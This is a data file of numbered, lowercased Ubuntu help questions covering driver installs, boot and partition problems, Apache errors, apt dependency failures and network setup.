329258	i ca n't connect internet using wireless network	i have tried to connect to internet using reliance netconnect+ ( manufactured by zte ) . i am unable to install it , even from the cd given by the manufacturer . my os is ubuntu 12.04 lts . can you help with any suggestions please ?
329259	nvidia-glx with nvidia geforce	i have a problem with opengl . if i try to get opengl version this is the result : geforce gtx 660 , and gl version 1.4 ( 2.1.2 nvidia 319.23 ) . then whenever i try to execute some opengl program i get this warning : libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . as suggested in this answer i should install with apt nvidia-glx but as i type it in the shell i get : reading package lists ... done building dependency tree reading state information ... done package nvidia-glx is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'nvidia-glx ' has no installation candidate note : i 've already installed the nvidia driver and cuda 5.0.. ( i think it is ok because i can run cuda examples.. ) nvidia driver on linux are making me crazy , please can someone offer me help ?
329263	how can i run kile after updating to texlive 2012 on ubuntu 12.04 ( for beginners )	i am using ubuntu 12.04 and kile 2.1.0 . after updating texlive from 2009 to 2012 kile did not work again . as mentioned here , i tried this : sudo apt-add-repository http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu sudo apt-get update sudo apt-get install texlive-base it did not change my error message . the error when i start kile is : the file /usr/share/texmf-texlive/tex/latex/koma-script/scrbook.cls could not be loaded this folder does not exist anymore . so , somehow a have to change the system settings . but where ? typing latex -v in kile gives me following result : pdftex 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) kpathsea version 6.1.0 copyright 2012 peter breitenlohner ( etex ) /han the thanh ( pdftex ) . there is no warranty . redistribution of this software is covered by the terms of both the pdftex copyright and the lesser gnu general public license . for more information about these matters , see the file named copying and the pdftex source . primary author of pdftex : peter breitenlohner ( etex ) /han the thanh ( pdftex ) . compiled with libpng 1.2.46 ; using libpng 1.2.46 compiled with zlib 1.2.3.4 ; using zlib 1.2.3.4 compiled with poppler version 0.18.4 i saw some hints changing this , but since i am new i did not understand how to implement theme on my computer . furthermore /usr/local/texlive/2012/bin/x86_64-linux does also not exist . thanks for your response !
329268	busy cursor ( spinning wait ) hangs	i 'm running ubuntu 13.04 , and the problem is that sometimes the mouse pointer icon is stuck with the busy cursor ( i can move it ) or spinning wait . when this happens , if mouse cursor is on any window titles , the unity launcher and panel , the cursor becomes busy . after a while , the problem simply goes . i ca n't send a screenshot because it does n't show up in the screenshot . i face this problem when try to run some applications : ubuntu one gksudo nautilus hardware specifications : seagate barracude 3.5 '' 7200rpm hdd msi z77a-g43 kingston hyperx 1600mhz ddr3 ram 4gb core i5-2500k my computer uses the intel hd 3000 that is on i5-2500k i do n't use any other driver than the one that comes with ubuntu 13.04 here is a video that you can see the problem produced : https : //www.dropbox.com/s/61rzeutdogog821/out-2.ogv i can say that there is not considerable change regarding the consumption of system resources while the cursor is spinning .
329269	a script for moving files from subdirs to parent dir	i am looking for a script for moving files from subdirs to the parent directory my folder structure looks like this . inside of a folder a i have a lot of folders named 1,2,3,4,5 ... all these folders contain 2 more folders named b and c. b and c contain files that i want to move one level up , then delete folders b and c. thank you in advance for any help you can give me with this script
329271	connecting to internet over proxy	we have proxy-server , i was able to set up network connection and mozilla works perfectly , it prompts for login/password and when logged-in it works , but when i try to download any software from repository or to search for updates , the system does not connect to internet . it does not prompt for login/password , as it does in windows update center . what is it that i need to configure ?
329272	partition move/resize	here 's the problem : i have a windows8/ubuntu 13.04 dualboot system . my ubuntu is installed between two ntfs partitions ( picture is attached ) . now i 'm running out of space , so i want to increase ubuntu partition . what is the best way to do this ? thanks .
329274	error : no such partion grub rescue >	i have windows 8 . i ca n't get to boot menu and i have formatted partition which had ubuntu on it . i need to get to windows . can any one please help using the grub prompt as i have tried all other methods ?
329278	`` connection failed : stream setup failed '' when using a2dp	i 'm trying to use my pc as a a2dp sink for my nexus 7 , but i ca n't seem to connect . the bluetooth dongle i 'm using is the asus-bt211 things that i have tried already : adding source to the pulseaudio `` enable '' line . adding socket to the pulseaudio `` disable '' line . installing all bluetooth packages . but still , it 's not fixed . its not an adapter problem . it works fine in windows .
329285	upgrade persistent livecd	i have a live dvd of ubuntu 13.04 , and a 10gb persistent ext2 casper-rw partition on a 64gb usb stick . what i want to know is , when ubuntu 13.10 comes out , will it be possible to use the new dvd image with the old casper-rw partition , or will i have to reformat and reinstall all my applications ?
329291	error installing libreoffice 4-0	i had installed libreoffice 4.0.4 , then i added ppa libreoffice 4-1 , and installed new version ( lo 4-1 ) . however , there is menu delay problem , so i decided to remove 4-1 and install 4-0 again ... sudo apt-get remove -- purge libreoffice* sudo apt-get clean sudo apt-get autoremove lo 4-1 was removed , but now i can not install 4-0 . this is error message : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libreoffice : depends : libreoffice-base but it is not going to be installed depends : libreoffice-calc but it is not going to be installed depends : libreoffice-core ( = 1:4.0.2-0ubuntu1 ) but it is not going to be installed depends : libreoffice-draw but it is not going to be installed depends : libreoffice-filter-mobiledev but it is not going to be installed depends : libreoffice-impress but it is not going to be installed depends : libreoffice-math but it is not going to be installed depends : libreoffice-report-builder-bin but it is not going to be installed depends : libreoffice-writer but it is not going to be installed depends : libreoffice-java-common ( > = 1:4.0.2~ ) but it is not going to be installed depends : python3.3-uno but it is not installable or python3-uno ( > = 4.0~ ) but it is not going to be installed or python-uno but it is not going to be installed recommends : libreoffice-gnome but it is not going to be installed or libreoffice-kde but it is not going to be installed e : unable to correct problems , you have held broken packages .
329295	ubuntu 13.04 vs ubuntu 13.10	if i install 13.10 on my system , is there a security risk if i do n't upgrade after two years ? also , if i do n't mind upgrading every two years , is recommended that i get 13.10 ? thank you !
329303	refind showing multiple ubuntu after update	i use refind to boot ubuntu from a macbook pro . ubuntu asked me to update ( not upgrade ) , and i did . when i restarted , refind was showing two entries for ubuntu ( boot boot\vmlinuz-0.2.7 vs. 0.1.9 for example ) . is this problematic ? is there any way to remove the extra boot entry ? is there any way to prevent this from happening after future updates ?
329304	switching from ubuntu desktop to ubuntu tablet	i have been considering buying a lenovo yoga 11s ( i am aware that i will have to recompile the kernel due to the wireless driver ) . my main concern is having a good experience in both laptop mode and tablet mode . i am wondering whether i can write a script that will be triggered when the hinge goes past 180째 that will switch the interface from ubuntu desktop to ubuntu tablet . my main questions are : is it possible to have ubuntu tablet installed as a de ? is it possible to run ubuntu tablet fullscreen in a window ?
329309	ati driver installation problem on mobilyty hd radeon 4250	i have laptop compaq presario cq-56 with mobility radeon 4250 . i use ubuntu 12.04 lts , i used this guide ( https : //help.ubuntu.com/community/binarydriverhowto/ati ) from step 3.1 to step with fglrxinfo , and i saw in my terminal info about chipset gpu only . i repaired broken packages from synaptic , but after rebooting the system i tried this command in terminal `` gksudo amdcccle '' and now i see one window where sad i do n't have any installed driver in my machine ... and if i use fglrxinfo i see this mtrx @ anaconda : ~ $ fglrxinfo x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 if i start from system settings additional drivers i see `` no proprietary drivers are in use on this system '' thank you .
329310	ubuntu installation skips a step ?	i have just changed my hdd on my pc to 500gb one . since my motherboard has only one sata port , i had to remove the older one . therefore , i installed windows xp on it first . then , i rebooted and then booted from my usb containing ubuntu 13.04 . i selected install ubuntu . i went through the first step ( the neccessary requirements one ) and then it took me to a step showing me 3 partitions . actually , one of them referred to the whole hdd , whereas the other two were partitions . one of them was windows xp ntfs partition . the pther was windows recovery partition . i do n't know why , it did not show me the step to select `` install alongside windows '' . it took me to a step where i had option to select to either wipe the whole hdd , or `` something else '' . i counted the steps , it was 1 , 2 and then suddenly 4 ! whats up with this thing ? corrupted pen drive ? although i can do one thing , which i think should work . i can use some partition tool on windows to create another partition , and then select that partition for ubuntu . but before doing that i want to know whether this problem can be solved without it or not . because i know that gparted is a powerful tool , and that would be a better option .
329311	problems with evolution installation	i tried to install evolution in ubuntu 12.04 lts through ubuntu software center , but ran into an error saying `` package dependencies can not be resolved '' error : the following packages have unmet dependencies : evolution : depends : evolution-common ( = 3.2.3-0ubuntu6 ) but 3.2.3-0ubuntu6 is to be installed what does this error mean ? is 3.2.3-0ubuntu6 , a version of ubuntu ? . i have been facing some or the other error in installing software from software center . how to resolve this issue ?
329314	ubuntu 12.04 icon panel - 1 icon for 2 windows	where do i change so that two windows do n't merge into one icon ? i hate having to click more than 1 time .
329315	how can i create an executable in linux ( beginner ) ?	the deal is that i just recently began to use linux ( lubuntu ) and i need some basic knowledge . my brightness on my packard bell dot netbook is always on the highest , and the brightness control buttons are n't working . i found a command line to set the brightness level to a specific percentage . iâd like to create three executables : 85 % , 50 % , 25 % . my question is how do i make a file on my desktop which when clicked upon it runs a certain line of command . i donât want to open the terminal every single time . thanks .
329318	ca n't restart apache 2	i 'm trying to restart my apache but it does n't work . this is the error : restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message i need some help . thank you
329320	chromium : `` running without the suid sandbox ! '' error	i 've downloaded and unpacked a fresh copy of chromium ( linux_x64 ) , and when i try to run the chrome binary , this happens : [ 23986:23986:0806/143027 : fatal : browser_main_loop.cc ( 148 ) ] running without the suid sandbox ! see https : //code.google.com/p/chromium/wiki/linuxsuidsandboxdevelopment for more information on developing with the sandbox on . aborted ( core dumped ) it does n't happen with ubuntu 's chromium-browser package . i can bypass the error by running chromium with -- no-sandbox but i 'd rather leave the sandbox enabled . chrome_sandbox has permissions 4755 and is executable by chrome . does anyone know how to fix this error ? it might not be related , but i 'm using full-disk encryption on my ubuntu install .
329322	how to make php webpage to access the file in /root directory ?	i am using linux 12.04 , apache and php is installed on it.i want to access a text file in /root/ folder.i am really confused with the permissions.the php script i m using < ? php $ file = fopen ( `` /root/cr.txt '' , `` r '' ) or exit ( `` unable to open file ! `` ) ; //output a line of the file until the end is reached while ( ! feof ( $ file ) ) { echo fgets ( $ file ) . `` < br > '' ; } fclose ( $ file ) ; ? > this script is able to access the file /var/www folder but not able to access /root/ip.txt file . please help and explain step to step possible .
329323	problem with restarting apache2	i 'm trying to restart apache2 : sudo service apache2 restart but get below error : restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message i 've tried to change sudo gedit /etc/apache2/httpd.conf blank file appears , and i 'd added this : servername localhost but that error does n't disappear ! any ideas would be appreciated .
329332	pulseaudio static crackle in 5.1 analog	i realize this is a repeated question , i just was not able to rectify the issue myself . anyways , i have a laptop running ubuntu 13.04 . it does not have a 5.1 sound card installed , but i have 5.1 speakers . so i purchased a usb sound card ( sound blaster x fi ) . it works 'out of the box ' with pulseaudio , only issue is any output other than stereo will cause static crackling . i 've attempted to remove pulseaudio and use alsa with gnome-alsamixer and even xfe4-mixer , neither correctly installed and would revert to my laptops speakers . currently just running pulseaudio in stereo output , but it 's a waste . if i ca n't fix this , probably going to go back to windows 7 .
329333	error with wubi installer- ubuntu 13.04 desktop	i 'm having problems installing ubuntu 13.04 desktop . i 've download the wubi installer on my windows computer . when i open this file using winrar & run wubi.exe , it attempts to install ubuntu but when the system restarts and the installation proceeds , an error occurs while copying files to hdd : the installer encountered an error copying files to the hard disk : [ error no . 5 ] input/output error i tried mounting the iso file using daemon tools , but it does n't let me install directly but asks for a cd/dvd .
329334	scissors analogue ?	in windows 7 , there is one very handy tool called `` scissors '' . i use it to capture part of the screen , one window or the whole desktop . it also has simple painting tools which are very useful - i can make a screenshot and mark some things on it with brush or colour marker . is there any analogue of this tool on ubuntu ? i know ubuntu has a tool that can capture a rectangle on screen and save as image but i can not choose file format and i can not add any marks on it , and have to open it in external editor and that is very inconvenient .
329335	`` 403-forbidden error '' when trying to open php pages in apache	i 'm trying to open .php pages , but 403 - forbidden appears . i 've tried : sudo chown -r hamed /var/www/ sudo chmod -r 755 /var/www/ but the problem was not solved . i 'm using lamp server .
329341	re-mapping altgr for navigation	i want to re-map altgr so i can navigate without having to use the arrow keys . altgr + l = â altgr + p = â etc ... i 've looked around and i ca n't find any examples that resembles what i want to do . most people who use xmodmap just want to re-map a single modifier key . and the man page was n't of much help . and with autokey it does n't seem to be possible to set any of the alt-keys as hot keys .
329351	fix ubuntu reinstall	i did something really stupid yesterday ... i accidentally did some weird command with mv and made it so the linux filesystem could not find anything . anyhow , i reinstalled ubuntu 11.10 from the same disk i did the first time , and then upgraded to 12.04 just like last time and it has n't been the same . now i have to boot into recovery mode or else i get stuck on the splash screen . after i log in i often have strange problems with the mouse and gui . the other thing is i 'm still left with pieces of the old filesystem on the last ubuntu partition . i think that might be interfering with the current one . how do i delete it ? also , could there be other causes ? thanks .
329353	ubuntu 13.04 black screen with nomodeset/xforcevesa/acpi=off	when trying to boot and install ubuntu 13.04 32 bit desktop edition , i am presented with a black screen . i have verified my isos md5sum , and have tried multiple flash drives . no combination of xforcevesa , acpi=off , and nomodeset have made any determinable difference . the target , is slightly unique . the kontron come-msp1 is a low-power small form factor x86 pc , with an expansion board with usb , gigabit ethernet , and a microsd card slot . system : http : //us.kontron.com/nano processor : http : //ark.intel.com/products/35463 system controller : http : //ark.intel.com/products/35444/intel-sch-us15w
329357	terminal buffer size	i 'm running ubuntu 13.04 . i perform a lot of work from the terminal and prefer to switch sessions ( using ctrl-alt-f1 , f2 , f3 , etc. ) . my desktop is less cluttered without the terminal windows . when i switch sessions ( ctrl-alt-f1 ) , the buffer only takes up the top left quarter of my screen . does anyone know how i can extend the buffer on both the x and y axis to utilize more of my monitor ? thanks !
329358	ca n't boot ubuntu from a usb thumb drive on a t61 lenovo	after downloading ubuntu 12.04 to a thumb drive , when i try to install on my lenovo t61 it simply says missing operating system !
329363	using unicode correctly in python 2.7 , ubuntu 13.4 ?	in the latest ubuntu , with the default python ( 2.7.4 ) , i ca n't get unicode to work . this is what 's happening : > > > print ( 'tři ' ) tři > > > d = { 3 : 'tři ' } > > > d [ 3 ] 't\xc5\x99i' > > > d = { 3 : u'tři ' } > > > d [ 3 ] u't\u0159i' obviously , i 'd like the third and/or the fifth line to show the same as the first line . i tried fiddling with sys ( import it , reload it , then setdefaultencoding ( 'utf-8 ' ) ) , but it did n't seem to help . everything else is working normally with unicode , as far as i can tell ( it being a modern version of a popular distro and all ) .
329369	installed ubuntu 10.10 on an ibm x40 but ca n't update !	i 've just brought an ibm think pad x40 of ebay and i 've installed ubuntu 10.10 . so far so good . first things first i loaded up terminal and typed sudo apt-get update but it would't update . so then i went into software centre and tried installing a game . it hit back with an error message saying it ca n't connect to the internet . but now , this is rather interesting , because i can surf the web on firefox with no issues ! has this happened to anyone else and if so how did you solve the problem ? thanks in advance !
329370	using scp to copy files from remote to home machine	this is probably a simple error , but i ca n't work it out . my computer hostname is felix ( hostname -f returns felix ) i am trying to move a file from my university account to my home computer using scp . i can ssh easily to the remote computer so that connection is fine , the scp syntax i am using is ( whilst connected to remote computer via ssh ) : scp myusername @ university_computer : /home/myusername/file.odt homeusername @ felix : desktop/file.odt i have tried a number of variations of this , and the error it returns is : ssh : felix : name or service not known which suggests to me that using homeusername @ felix is n't the right syntax to be using . i am not a superuser on the university system and only have access to my files , so can not access any system files . any ideas ?
329382	what application can i use to create and order a photo book ? ( like apple 's iphoto )	i have about 100 photo ( each photo is about 9 mb ) and i would like to make a photo book and then order it as a printed book . is there any native gui app to do the job ? i have tried shotwell but the only action i can do is sending the photos to a picasa web album , and after that ? web based solution like blurb 's bookify does not work for me , the photo uploads is not working properly . i am in italy . what do you suggest ? is there anyone with a tested and working procedure to get the job done ?
329385	why i am unable to install libboost-dev packages on ubuntu 12.04	i am working on openbts project on my hp laptop using usrp1 . to run this hardware i need to install its driver , but while doing so , it is saying libboost-dev packages are not going to install . i tried it from ubuntu software center , but again same problem . any suggestions would help .
329386	win8 not booting after dual-boot install of 13.04 !	my problem seems to be the reverse of most ! ! fully functional win8/64-bit laptop , performed dual-boot install of v13.04 per instructions on linuxbsdos.com forums . i expected the machine to boot to windows to complete last step ( tweak of boot loader ) , but instead i can only get into the ubuntu install ! no bootloader screen , no selection , just right into ubuntu ! all existing win8 partitions are still intact when finished installing 13.04 , so just looking for some help on where to go from here . it has been years since i worked with linux much , so not familiar with the tools in the curernt release !
329391	running a vpn server off ubuntu desktop ?	i am unfamiliar with ubuntu and linux in general . i bought 3 old dell poweredge 2650 servers off ebay for âł20 . i did n't really know what i was going to do with them , but for the price , they seemed unbeatable . i would like to learn to get used to using linux as it seems the web virtually runs off linux ! i thought ubuntu would be a good place to start , and so i put a slightly outdated version of ubuntu on the servers , because some of the newer versions would not install for some reason . anyway , now i am thinking that i would like to run one of the servers as a vpn . however , i installed the desktop version of ubuntu as i thought a gui would be a better place to start off for me . is this a problem ? i thought this would be a great idea as it would get me started in the world of networking and security . i would like to eventually have all the internet traffic from the rest of my computers routed through the server safely . i assume this means using the pptp protocol , which i have only briefly heard of . if you have any advise for me , resources to begin learning about ubuntu , or how to get started with this stuff then please reply .
329395	cant find 7zip after installation mythbuntu	i installed 7zip through web but cant find it in the menue nor anywhere else . what goes wrong ? greets tom
329397	switch from ubuntu 13.04 64bit to 32bit	actually after reading my problem , most of you will laugh at me . i myself am , for such a stupid mistake . what exactly happened was , i was downloading 32-bit version of ubuntu 13.04 for my old pc . after downloading , one of my friend also wanted ubuntu 13.04 , although his pc had a 64-bit hardware . so i thought of downloading 64-bit version too . but mistakenly , instead of writing the ia64 version onto his usb drive , i wrote the 64-bit os , replacing my 32-bit one . and i gave him a blank pen drive . while installing ubuntu , i certainly felt something was different . different in the sense , that it was taking to much time to load . and then while using gnome tweak tool , i found out it actually was 64 bit . and i have also changed my hdd , so i do n't have the iso files any more . so any way to go to 32-bit without losing data or anything ?
329407	making xinput change permenant	i do n't like the default functionality of the mouse 's scroll wheel click doing a `` paste '' . i can change that by doing the follwing : $ xinput set-button-map 12 1 0 3 4 5 6 7 this works fine , but if i reboot , i have to remember to do it again . my question is how can i make this happen automatically if i need to reboot , etc ? i 'm using ubuntu 12.04
329408	no grub2 boot menu	i installed ubuntu 13.04 after using windows 8 for a while . everything during installation went smooth and fine but after the reboot , i am unable to boot into ubuntu as my computer directly boots into windows ! i tried everything on the web using the live usb - boot repair , reintall , everything ! still no help . i got this from the boot repair program - ubuntu pastebin thank you in advance .
329410	minecraft offline produces black screen	when i try to play minecraft offline it says updating minecraft ... and then i get a black screen . no error is displayed . i am using the minecraft laucher jar file . are there any packages i need to download in order to play minecraft ?
329416	what to do about 6 year old laptop	i have a dell xps m1210 with a nvidia 7400go and 3gb of ram . i would like to run ubuntu again but i have found it to be sluggish and slow with unity , even the gnome fallback seems sluggish . i do n't know if it is simple as a drive problem or if it is 13.04 . i remember that everything seemed fine with 12.04 . should i go back to the lts of ubuntu or should i stick it out ? can anyone recommend a less resource intensive desktop environment ?
329424	can not start graphical programs with sudo	i have a fresh ubuntu 12.04 installation with encrypted home partition . i copied over my home folder from another computer . when i try to launch graphical programs via sudo i get errors like the following . nailor @ macbuntu : ~ $ sudo synaptic no protocol specified no protocol specified ( synaptic:18080 ) : gtk-warning ** : can not open display : :0 or nailor @ macbuntu : ~ $ sudo gedit no protocol specified ** ( gedit:18085 ) : warning ** : command line `dbus-launch -- autolaunch=3122eb74fe95c3593833223f0000000c -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : no protocol specified\nno protocol specified\nautolaunch error : x11 initialization failed.\n no protocol specified can not open display : run 'gedit -- help ' to see a full list of available command line options . or nailor @ macbuntu : ~ $ sudo xterm no protocol specified no protocol specified warning : this program is an suid-root program or is being run by the root user . the full text of the error or warning message can not be safely formatted in this environment . you may get a more descriptive message by running the program as a non-root user or by removing the suid bit on the executable . xterm xt error : ca n't open display : % s nailor @ macbuntu : ~ $ what can i do to correct the situation ? ps : situation with gksudo nailor @ macbuntu : ~ $ gksudo xterm error copying '/home/nailor/.xauthority ' to '/tmp/libgksu-yrgesp ' : no such file or directorynailor @ macbuntu : ~ $
329426	deleted ubuntu touch from galaxy nexus , now there is no os , how can i sideload os from windows	i installed ubuntu touch on my galaxy nexus . i wanted to put the most recent build on it so i deleted ubuntu and now i do n't have an os . windows sees my phone in device manager but i can not access the internal storage to put the image on the sd card to re deploy . help
329435	gtk skip_taskbar_hint ( seen in glade-ui-designer ) equivalent in qt	with glade designer that lets you set up gtk-ui 's you can check the option that windows are not shown in the launcher . if i take a look at the ui-file generated by glade , it says < property name= '' skip_taskbar_hint '' > true < /property > . in gtk code this hint is window.set_property ( 'skip-taskbar-hint ' , true ) . however i believe that this option is not exclusively gtk-specific , and want to apply this one on my pyqt4-app . the ubuntu window manager must be able to receive that hint , otherwise i would see the window of a gtk-application i use ( stickynotes-indicator ) . so there must be a way of doing this in qt or any other language , right ? does anybody know such an option ? python or qt syntax , does n't matter !
329438	how do i set ubuntu software center as default to apt links ?	i was about to install bank-id but got stuck with this apt-link . if i click on that link the file manager gives me the opportunity to choose a specific program to open the file . i ca n't find ubuntu software center by choosing `` browse '' and i tried to find any setting to set ubuntu software center as default for apt-links . i do n't even know if that 's the correct way of installing this software . if anyone know any other way , tell me . i 've been trying on my own for a while so perhaps i might have changed any settings . i was a bit suspicious so i tried to download skype as well to see if it was possible to install any program using ubuntu software center . that did n't work out .
329448	fan constantly on , dell inspiron 15r , ubuntu 12.04	problem i installed ubuntu 12.04 on a dell inspiron 15r . as soon as i boot , the fan starts at full speed and stays constantly on . i 've seen similar posts , where installing fan control apps are recommended like i8kmon jupiter mesa-utils but in general , these do not allow for automatic fan speed control and one has to manually set the fan speed , while keeping track of the processor 's temperature . see : similar post . technical specs processor : intel® core™ i5-3337u cpu @ 1.80ghz × 4 ram : 6 gb disk : 500 gb graphics : standard intel drivers os type : ubuntu 12.04 ( 64-bit ) lm-sensors coretemp-isa-0000 adapter : isa adapter physical id 0 : +45.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +40.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +45.0°c ( high = +87.0°c , crit = +105.0°c ) any hint on how to solve this ?
329450	e : some index files failed to download . they have been ignored , or old ones used instead after apt-get update	my /etc/apt/sources.list contained : nazar_art @ nazar-desctop : /etc/apt $ cat source.list deb http : //security.ubuntu.com/ubuntu precise-security main universe nazar_art @ nazar-desctop : /etc/apt $ cat sources.list.old deb http : //archive.ubuntu.com/ubuntu precise universe nazar_art @ nazar-desctop : /etc/apt $ cat source.list deb http : //security.ubuntu.com/ubuntu precise-security main universe nazar_art @ nazar-desctop : /etc/apt $ i updated according to this post how do i restore the default repositories ? but it called another problem when i run sudo apt-get update i have some output like this : err http : //ua.archive.ubuntu.com main/restricted sources 404 not found [ ip : 91.189.91.13 80 ] err http : //ua.archive.ubuntu.com main/universe sources 404 not found [ ip : 91.189.91.13 80 ] err http : //ua.archive.ubuntu.com main/multiverse sources 404 not found [ ip : 91.189.91.13 80 ] err http : //ua.archive.ubuntu.com main/restricted amd64 packages 404 not found [ ip : 91.189.91.13 80 ] err http : //ua.archive.ubuntu.com main/universe amd64 packages 404 not found [ ip : 91.189.91.13 80 ] and this : w : failed to fetch http : //ua.archive.ubuntu.com/ubuntu/dists/-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //ua.archive.ubuntu.com/ubuntu/dists/-backports/universe/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //ua.archive.ubuntu.com/ubuntu/dists/-backports/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . update : i did this command ( thanks nikth ) : find /etc/apt -name '*.list ' -exec bash -c 'echo -e `` \n $ 1\n '' ; cat -n `` $ 1 '' ' _ ' { } ' \ ; whole output : /etc/apt/sources.list 1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 2 # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # 3 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 4 5 # # # # # # ubuntu main repos 6 deb http : //ua.archive.ubuntu.com/ubuntu/ main restricted universe multiverse 7 deb-src http : //ua.archive.ubuntu.com/ubuntu/ main restricted universe multiverse 8 9 # # # # # # ubuntu update repos 10 deb http : //ua.archive.ubuntu.com/ubuntu/ -security main restricted universe multiverse 11 deb http : //ua.archive.ubuntu.com/ubuntu/ -updates main restricted universe multiverse 12 deb http : //ua.archive.ubuntu.com/ubuntu/ -proposed main restricted universe multiverse 13 deb http : //ua.archive.ubuntu.com/ubuntu/ -backports main restricted universe multiverse 14 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -security main restricted universe multiverse 15 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -updates main restricted universe multiverse 16 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -proposed main restricted universe multiverse 17 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -backports main restricted universe multiverse 18 19 20 21 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 22 # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # 23 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 24 25 # # # # # # ubuntu main repos 26 deb http : //ua.archive.ubuntu.com/ubuntu/ main restricted universe multiverse 27 deb-src http : //ua.archive.ubuntu.com/ubuntu/ main restricted universe multiverse 28 29 # # # # # # ubuntu update repos 30 deb http : //ua.archive.ubuntu.com/ubuntu/ -security main restricted universe multiverse 31 deb http : //ua.archive.ubuntu.com/ubuntu/ -updates main restricted universe multiverse 32 deb http : //ua.archive.ubuntu.com/ubuntu/ -proposed main restricted universe multiverse 33 deb http : //ua.archive.ubuntu.com/ubuntu/ -backports main restricted universe multiverse 34 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -security main restricted universe multiverse 35 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -updates main restricted universe multiverse 36 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -proposed main restricted universe multiverse 37 deb-src http : //ua.archive.ubuntu.com/ubuntu/ -backports main restricted universe multiverse 38 39 /etc/apt/source.list 1 deb http : //security.ubuntu.com/ubuntu precise-security main universe /etc/apt/sources.list.d/ubuntu-extras.list 1 deb http : //extras.ubuntu.com/ubuntu/ precise main # added by software-center 2 deb-src http : //extras.ubuntu.com/ubuntu/ precise main # added by software-center /etc/apt/sources.list.d/webupd8team-y-ppa-manager-precise.list 1 deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu precise main /etc/apt/sources.list.d/playonlinux.list 1 deb http : //deb.playonlinux.com/ quantal main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_intellij-idea-ce_ubuntu.list 1 deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/webupd8team-sublime-text-3-precise.list 1 deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu precise main /etc/apt/sources.list.d/medibuntu.list 1 # # please report any bug on https : //bugs.launchpad.net/medibuntu/ 2 deb http : //packages.medibuntu.org/ precise free non-free # medibuntu - ubuntu 12.04 `` precise pangolin '' 3 # deb-src http : //packages.medibuntu.org/ precise free non-free # medibuntu ( source ) - ubuntu 12.04 `` precise pangolin '' /etc/apt/sources.list.d/lezhoev-qstamina-precise.list 1 deb http : //ppa.launchpad.net/lezhoev/qstamina/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/lezhoev/qstamina/ubuntu precise main /etc/apt/sources.list.d/webupd8team-java-precise.list 1 deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main /etc/apt/sources.list.d/tualatrix-ppa-precise.list 1 deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu precise main /etc/apt/sources.list.d/kilian-f_lux-precise.list 1 deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu precise main /etc/apt/sources.list.d/ubuntu-wine-ppa-precise.list 1 deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu precise main /etc/apt/sources.list.d/fsqcds-goldendict-precise.list 1 deb http : //ppa.launchpad.net/fsqcds/goldendict/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/fsqcds/goldendict/ubuntu precise main /etc/apt/sources.list.d/webupd8team-rhythmbox-precise.list 1 deb http : //ppa.launchpad.net/webupd8team/rhythmbox/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/webupd8team/rhythmbox/ubuntu precise main /etc/apt/sources.list.d/upubuntu-com-devel-precise.list 1 deb http : //ppa.launchpad.net/upubuntu-com/devel/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/upubuntu-com/devel/ubuntu precise main
